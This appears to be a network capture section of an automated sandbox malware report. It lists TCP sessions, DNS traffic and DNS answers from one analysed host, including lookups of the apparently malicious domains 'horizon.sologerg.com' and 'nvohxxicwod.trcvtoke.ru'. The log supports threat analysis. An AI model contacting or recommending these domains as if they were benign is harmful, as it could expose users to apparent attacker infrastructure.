Feb 26, 2024 18:12:52.114322901 CET	443	49725	104.21.20.93	192.168.2.5
Feb 26, 2024 18:12:52.114850044 CET	443	49725	104.21.20.93	192.168.2.5
Feb 26, 2024 18:12:52.115160942 CET	49725	443	192.168.2.5	104.21.20.93
Feb 26, 2024 18:12:52.115231037 CET	443	49725	104.21.20.93	192.168.2.5
Feb 26, 2024 18:12:52.156481028 CET	49725	443	192.168.2.5	104.21.20.93
Feb 26, 2024 18:12:52.236624002 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:52.236983061 CET	49726	443	192.168.2.5	172.67.193.41
Feb 26, 2024 18:12:52.236999989 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:52.238097906 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:52.238177061 CET	49726	443	192.168.2.5	172.67.193.41
Feb 26, 2024 18:12:52.238892078 CET	49726	443	192.168.2.5	172.67.193.41
Feb 26, 2024 18:12:52.238959074 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:52.239280939 CET	49726	443	192.168.2.5	172.67.193.41
Feb 26, 2024 18:12:52.239289045 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:52.287774086 CET	49726	443	192.168.2.5	172.67.193.41
Feb 26, 2024 18:12:53.082170010 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:53.082321882 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:53.082401037 CET	49726	443	192.168.2.5	172.67.193.41
Feb 26, 2024 18:12:53.084106922 CET	49726	443	192.168.2.5	172.67.193.41
Feb 26, 2024 18:12:53.084122896 CET	443	49726	172.67.193.41	192.168.2.5
Feb 26, 2024 18:12:53.364120007 CET	443	49714	142.251.167.104	192.168.2.5
Feb 26, 2024 18:12:53.364202023 CET	443	49714	142.251.167.104	192.168.2.5
Feb 26, 2024 18:12:53.364255905 CET	49714	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:12:53.423290968 CET	49714	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:12:53.423309088 CET	443	49714	142.251.167.104	192.168.2.5
Feb 26, 2024 18:12:54.209681988 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:54.209717035 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:54.209783077 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:54.213661909 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:54.213681936 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:54.455729008 CET	443	49722	104.21.20.93	192.168.2.5
Feb 26, 2024 18:12:54.455887079 CET	443	49722	104.21.20.93	192.168.2.5
Feb 26, 2024 18:12:54.455945969 CET	49722	443	192.168.2.5	104.21.20.93
Feb 26, 2024 18:12:54.723457098 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:54.723535061 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:54.921680927 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:54.921700954 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:54.922254086 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:54.966908932 CET	49722	443	192.168.2.5	104.21.20.93
Feb 26, 2024 18:12:54.966943026 CET	443	49722	104.21.20.93	192.168.2.5
Feb 26, 2024 18:12:54.972300053 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:55.957379103 CET	49703	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:55.958158016 CET	49703	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:55.960098028 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:55.960130930 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:55.960206032 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:55.964833975 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:55.964850903 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:56.112540960 CET	443	49703	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:56.113198996 CET	443	49703	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:56.138571024 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:56.181942940 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.286015034 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:56.286101103 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:56.464361906 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464426994 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464447021 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464487076 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464540005 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:56.464543104 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464565039 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464577913 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:56.464602947 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:56.464642048 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464699984 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:56.464699984 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:56.464709997 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464756966 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:56.464762926 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464828014 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:56.464875937 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:57.176047087 CET	49732	443	192.168.2.5	40.127.169.103
Feb 26, 2024 18:12:57.176064014 CET	443	49732	40.127.169.103	192.168.2.5
Feb 26, 2024 18:12:57.178030968 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:57.178052902 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:57.178497076 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:57.178571939 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:57.182677984 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:57.182733059 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:57.183250904 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:57.183259964 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:57.544737101 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:57.544802904 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:57.544939041 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:12:57.544980049 CET	443	49735	23.1.237.91	192.168.2.5
Feb 26, 2024 18:12:57.545082092 CET	49735	443	192.168.2.5	23.1.237.91
Feb 26, 2024 18:13:07.100627899 CET	443	49725	104.21.20.93	192.168.2.5
Feb 26, 2024 18:13:07.100853920 CET	443	49725	104.21.20.93	192.168.2.5
Feb 26, 2024 18:13:07.100918055 CET	49725	443	192.168.2.5	104.21.20.93
Feb 26, 2024 18:13:07.141102076 CET	49725	443	192.168.2.5	104.21.20.93
Feb 26, 2024 18:13:07.141118050 CET	443	49725	104.21.20.93	192.168.2.5
Feb 26, 2024 18:13:33.776602983 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:33.776669979 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:33.776738882 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:33.777545929 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:33.777563095 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.283133984 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.283240080 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.379873991 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.379909992 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.380908966 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.400305033 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.441905975 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.558841944 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.558897018 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.558958054 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.558983088 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.559027910 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.559041023 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.559093952 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.559174061 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.559228897 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.559281111 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.559333086 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.716053009 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.716123104 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.716165066 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.716178894 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.716192961 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.716265917 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.716327906 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.716398954 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.716666937 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.716684103 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:34.716753006 CET	49739	443	192.168.2.5	20.114.59.183
Feb 26, 2024 18:13:34.716759920 CET	443	49739	20.114.59.183	192.168.2.5
Feb 26, 2024 18:13:43.066255093 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:43.066297054 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:43.066359997 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:43.066844940 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:43.066864967 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:43.082268953 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.082299948 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.082356930 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.082726002 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.082735062 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.272948980 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:43.273354053 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:43.273389101 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:43.274017096 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:43.274383068 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:43.274514914 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:43.274862051 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.275228977 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.275242090 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.275592089 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.275933027 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.275984049 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.276093006 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.317910910 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.342788935 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:43.489774942 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.489845037 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.489898920 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.490190029 CET	49742	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.490205050 CET	443	49742	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.491041899 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.491077900 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.491131067 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.491756916 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.491772890 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.682281971 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.682570934 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.682580948 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.682950974 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.683284044 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.683351994 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.683576107 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.683598042 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.683603048 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.892891884 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.892972946 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.893107891 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.893239021 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.893239021 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:43.893256903 CET	443	49743	35.190.80.1	192.168.2.5
Feb 26, 2024 18:13:43.893302917 CET	49743	443	192.168.2.5	35.190.80.1
Feb 26, 2024 18:13:53.260106087 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:53.260262012 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:13:53.260324955 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:55.149974108 CET	49741	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:13:55.150028944 CET	443	49741	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:08.035948992 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.035974979 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.036051989 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.036501884 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.036529064 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.234424114 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.234859943 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.234895945 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.235413074 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.235474110 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.236417055 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.236476898 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.237715006 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.237868071 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.237993002 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.279632092 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.279670000 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.326504946 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.454509020 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.455105066 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:08.455240011 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.458492041 CET	49746	443	192.168.2.5	172.253.63.113
Feb 26, 2024 18:14:08.458528996 CET	443	49746	172.253.63.113	192.168.2.5
Feb 26, 2024 18:14:43.125950098 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:43.126049042 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:43.126235962 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:43.126769066 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:43.126801968 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:43.321634054 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:43.373203039 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:43.403724909 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:43.403742075 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:43.404984951 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:43.407336950 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:43.407524109 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:43.451261044 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:53.332760096 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:53.332920074 CET	443	49747	142.251.167.104	192.168.2.5
Feb 26, 2024 18:14:53.332994938 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:55.141513109 CET	49747	443	192.168.2.5	142.251.167.104
Feb 26, 2024 18:14:55.141555071 CET	443	49747	142.251.167.104	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 26, 2024 18:12:38.816490889 CET	61263	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:38.816868067 CET	57505	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:38.836518049 CET	60380	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:38.836877108 CET	50433	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:38.837846041 CET	64411	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:38.838124037 CET	65476	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:38.942670107 CET	53	61263	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:38.944303989 CET	53	57505	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:38.958959103 CET	53	60380	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:38.960030079 CET	53	50433	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:38.962955952 CET	53	64411	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:38.964221001 CET	53	65476	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:38.977407932 CET	53	62000	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:39.534667015 CET	53	59198	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:43.023768902 CET	50677	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:43.024101973 CET	53189	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:43.078334093 CET	56110	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:43.078474045 CET	53973	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:43.148443937 CET	53	53189	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:43.148497105 CET	53	50677	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:43.202454090 CET	53	56110	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:43.203358889 CET	53	53973	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:44.308892012 CET	53	62275	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:50.583419085 CET	52981	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:50.584415913 CET	60197	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:50.710969925 CET	53	60197	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:50.711760998 CET	53	52981	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:51.847523928 CET	60930	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:51.848006964 CET	51087	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:12:51.971939087 CET	53	60930	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:51.975792885 CET	53	51087	1.1.1.1	192.168.2.5
Feb 26, 2024 18:12:57.049896955 CET	53	65060	1.1.1.1	192.168.2.5
Feb 26, 2024 18:13:16.122417927 CET	53	57194	1.1.1.1	192.168.2.5
Feb 26, 2024 18:13:38.309537888 CET	53	59611	1.1.1.1	192.168.2.5
Feb 26, 2024 18:13:38.620532990 CET	53	56454	1.1.1.1	192.168.2.5
Feb 26, 2024 18:14:06.117223024 CET	53	49439	1.1.1.1	192.168.2.5
Feb 26, 2024 18:14:07.911369085 CET	65292	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:14:07.911967993 CET	61177	53	192.168.2.5	1.1.1.1
Feb 26, 2024 18:14:08.034275055 CET	53	65292	1.1.1.1	192.168.2.5
Feb 26, 2024 18:14:08.035459995 CET	53	61177	1.1.1.1	192.168.2.5
Feb 26, 2024 18:14:52.238149881 CET	53	56580	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 26, 2024 18:12:38.816490889 CET	192.168.2.5	1.1.1.1	0xea2e	Standard query (0)	horizon.sologerg.com	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.816868067 CET	192.168.2.5	1.1.1.1	0x2bc3	Standard query (0)	horizon.sologerg.com	65	IN (0x0001)	false
Feb 26, 2024 18:12:38.836518049 CET	192.168.2.5	1.1.1.1	0x56f8	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.836877108 CET	192.168.2.5	1.1.1.1	0x7e3f	Standard query (0)	clients2.google.com	65	IN (0x0001)	false
Feb 26, 2024 18:12:38.837846041 CET	192.168.2.5	1.1.1.1	0x9e5c	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.838124037 CET	192.168.2.5	1.1.1.1	0xf82f	Standard query (0)	accounts.google.com	65	IN (0x0001)	false
Feb 26, 2024 18:12:43.023768902 CET	192.168.2.5	1.1.1.1	0x5b11	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.024101973 CET	192.168.2.5	1.1.1.1	0xb404	Standard query (0)	www.google.com	65	IN (0x0001)	false
Feb 26, 2024 18:12:43.078334093 CET	192.168.2.5	1.1.1.1	0x761b	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.078474045 CET	192.168.2.5	1.1.1.1	0x7a27	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false
Feb 26, 2024 18:12:50.583419085 CET	192.168.2.5	1.1.1.1	0xeef1	Standard query (0)	nvohxxicwod.trcvtoke.ru	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:50.584415913 CET	192.168.2.5	1.1.1.1	0xa1d1	Standard query (0)	nvohxxicwod.trcvtoke.ru	65	IN (0x0001)	false
Feb 26, 2024 18:12:51.847523928 CET	192.168.2.5	1.1.1.1	0x1802	Standard query (0)	nvohxxicwod.trcvtoke.ru	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:51.848006964 CET	192.168.2.5	1.1.1.1	0x9604	Standard query (0)	nvohxxicwod.trcvtoke.ru	65	IN (0x0001)	false
Feb 26, 2024 18:14:07.911369085 CET	192.168.2.5	1.1.1.1	0x73ad	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:14:07.911967993 CET	192.168.2.5	1.1.1.1	0x900d	Standard query (0)	clients1.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 26, 2024 18:12:38.942670107 CET	1.1.1.1	192.168.2.5	0xea2e	No error (0)	horizon.sologerg.com		104.21.20.93	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.942670107 CET	1.1.1.1	192.168.2.5	0xea2e	No error (0)	horizon.sologerg.com		172.67.192.10	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.944303989 CET	1.1.1.1	192.168.2.5	0x2bc3	No error (0)	horizon.sologerg.com			65	IN (0x0001)	false
Feb 26, 2024 18:12:38.958959103 CET	1.1.1.1	192.168.2.5	0x56f8	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 26, 2024 18:12:38.958959103 CET	1.1.1.1	192.168.2.5	0x56f8	No error (0)	clients.l.google.com		142.251.167.139	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.958959103 CET	1.1.1.1	192.168.2.5	0x56f8	No error (0)	clients.l.google.com		142.251.167.101	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.958959103 CET	1.1.1.1	192.168.2.5	0x56f8	No error (0)	clients.l.google.com		142.251.167.100	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.958959103 CET	1.1.1.1	192.168.2.5	0x56f8	No error (0)	clients.l.google.com		142.251.167.138	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.958959103 CET	1.1.1.1	192.168.2.5	0x56f8	No error (0)	clients.l.google.com		142.251.167.102	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.958959103 CET	1.1.1.1	192.168.2.5	0x56f8	No error (0)	clients.l.google.com		142.251.167.113	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:38.960030079 CET	1.1.1.1	192.168.2.5	0x7e3f	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 26, 2024 18:12:38.962955952 CET	1.1.1.1	192.168.2.5	0x9e5c	No error (0)	accounts.google.com		172.253.122.84	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.148443937 CET	1.1.1.1	192.168.2.5	0xb404	No error (0)	www.google.com			65	IN (0x0001)	false
Feb 26, 2024 18:12:43.148497105 CET	1.1.1.1	192.168.2.5	0x5b11	No error (0)	www.google.com		142.251.167.104	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.148497105 CET	1.1.1.1	192.168.2.5	0x5b11	No error (0)	www.google.com		142.251.167.99	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.148497105 CET	1.1.1.1	192.168.2.5	0x5b11	No error (0)	www.google.com		142.251.167.147	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.148497105 CET	1.1.1.1	192.168.2.5	0x5b11	No error (0)	www.google.com		142.251.167.103	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.148497105 CET	1.1.1.1	192.168.2.5	0x5b11	No error (0)	www.google.com		142.251.167.105	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.148497105 CET	1.1.1.1	192.168.2.5	0x5b11	No error (0)	www.google.com		142.251.167.106	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:43.202454090 CET	1.1.1.1	192.168.2.5	0x761b	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Feb 26, 2024 18:12:50.710969925 CET	1.1.1.1	192.168.2.5	0xa1d1	No error (0)	nvohxxicwod.trcvtoke.ru			65	IN (0x0001)	false
Feb 26, 2024 18:12:50.711760998 CET	1.1.1.1	192.168.2.5	0xeef1	No error (0)	nvohxxicwod.trcvtoke.ru		104.21.20.153	A (IP address)	IN (0x0001)	false
